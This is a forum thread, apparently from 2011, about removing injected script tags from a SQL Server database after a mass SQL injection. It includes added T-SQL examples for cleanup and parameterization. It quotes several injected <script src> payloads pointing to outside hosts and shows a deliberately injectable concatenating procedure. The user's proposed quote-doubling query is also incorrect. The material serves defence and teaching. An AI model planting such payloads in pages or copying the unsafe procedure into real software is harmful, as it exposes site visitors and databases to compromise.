stegothdump
Starting Member
9 Posts

Posted - 2011-10-09 : 15:26:32

Hi There,

I have a SQL DB that needs to be cleansed of the recent SQL injection attack. I have written the following code:

UPDATE [tableName]
SET columnName = REPLACE(CAST(columnName AS VARCHAR(8000)), '"></title><script src="http://1.verynx.cn/w.js"></script><!--', '')
WHERE columnName LIKE '%"></title><script src="http://1.verynx.cn/w.js"></script><!--%'

The problem is that the <script src='http://visionaryliongroup.com.au/images/counter.php'></script> text includes a single apostrophe rather than the double quote as shown in the example above. How can I get round this?

tkizer
Almighty SQL Goddess
38200 Posts

stegothdump
Starting Member
9 Posts

Posted - 2011-10-10 : 03:14:42

So would that be two single quotes round the stuff I want to take out, i.e.

UPDATE Table1
SET Col1 = REPLACE(Col1, '<script src='http://www0.douhunqn.cn/csrss/w.js'></script>', '')

would become

UPDATE Table1
SET Col1 = REPLACE(Col1, ''<script src='http://www0.douhunqn.cn/csrss/w.js'></script>'', '')

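Added example, not from the thread, covering both posts above: in T-SQL each single quote inside a string literal is written as two single quotes while the literal itself is still delimited by one quote on each side. The table and column names are the placeholders from the first post, and the payload is the one quoted there.

```sql
-- Added example (not from the thread). [tableName] and columnName are
-- placeholders; the payload is the string quoted in the first post.
-- Every embedded ' becomes '' ; the outer delimiters stay single.
DECLARE @payload NVARCHAR(4000) =
    N'<script src=''http://visionaryliongroup.com.au/images/counter.php''></script>';

-- 1. Look before you update: how many rows carry the payload?
--    CAST to NVARCHAR(MAX) handles text/ntext columns, which REPLACE does
--    not accept directly. CHARINDEX is used instead of LIKE so that %, _ or [
--    inside a payload are never interpreted as wildcards.
SELECT COUNT(*) AS affected_rows
FROM [tableName]
WHERE CHARINDEX(@payload, CAST(columnName AS NVARCHAR(MAX))) > 0;

-- 2. Remove it inside a transaction so the result can be inspected first.
BEGIN TRANSACTION;

UPDATE [tableName]
SET columnName = REPLACE(CAST(columnName AS NVARCHAR(MAX)), @payload, N'')
WHERE CHARINDEX(@payload, CAST(columnName AS NVARCHAR(MAX))) > 0;

-- 3. Nothing should match any more: expect 0 here, then COMMIT
--    (or ROLLBACK TRANSACTION if the counts look wrong).
SELECT COUNT(*) AS remaining_rows
FROM [tableName]
WHERE CHARINDEX(@payload, CAST(columnName AS NVARCHAR(MAX))) > 0;

COMMIT TRANSACTION;
```

The same pattern is repeated once per distinct payload string; the cleanup only removes what was stored and does nothing about the injection point that wrote it.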
madhivanan
Premature Yak Congratulator
22864 Posts

paultech
Yak Posting Veteran
79 Posts

Posted - 2011-10-23 : 14:27:21

Hello, maybe you can use parameters instead of a direct SQL query; by using parameters and parsing them into the query, it should be prevented from SQL injection.

Paul Tech
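Added example, not from the thread, of what paultech's suggestion looks like on the SQL Server side: a hypothetical dbo.Products table and search procedure, shown first with the caller's input concatenated into the statement text and then with the value bound as a parameter.

```sql
-- Added example (not from the thread). dbo.Products, FindProducts_Unsafe,
-- FindProducts and @search are hypothetical names.

-- Concatenation: whatever the caller passes in @search becomes part of the
-- statement text, so quote characters in the input change the query itself.
-- This is the shape of code that lets stored <script> payloads get written.
CREATE PROCEDURE dbo.FindProducts_Unsafe
    @search NVARCHAR(100)
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT ProductId, Name FROM dbo.Products WHERE Name LIKE ''%'
        + @search + N'%''';
    EXEC (@sql);
END;
GO

-- Parameterized: the statement text is fixed and the input is bound as a
-- typed value, so the server never parses the caller's data as SQL.
CREATE PROCEDURE dbo.FindProducts
    @search NVARCHAR(100)
AS
BEGIN
    -- Static form: preferred whenever dynamic SQL is not actually needed.
    SELECT ProductId, Name
    FROM dbo.Products
    WHERE Name LIKE N'%' + @search + N'%';

    -- Dynamic form, for cases that genuinely need sp_executesql:
    -- the text below never contains the caller's value, only @term.
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT ProductId, Name FROM dbo.Products '
        + N'WHERE Name LIKE N''%'' + @term + N''%''';
    EXEC sp_executesql @sql, N'@term NVARCHAR(100)', @term = @search;
END;
GO
```

The application code that calls these procedures must pass @search as a command parameter as well; building the EXEC string by concatenation on the client side reintroduces the same problem one layer up.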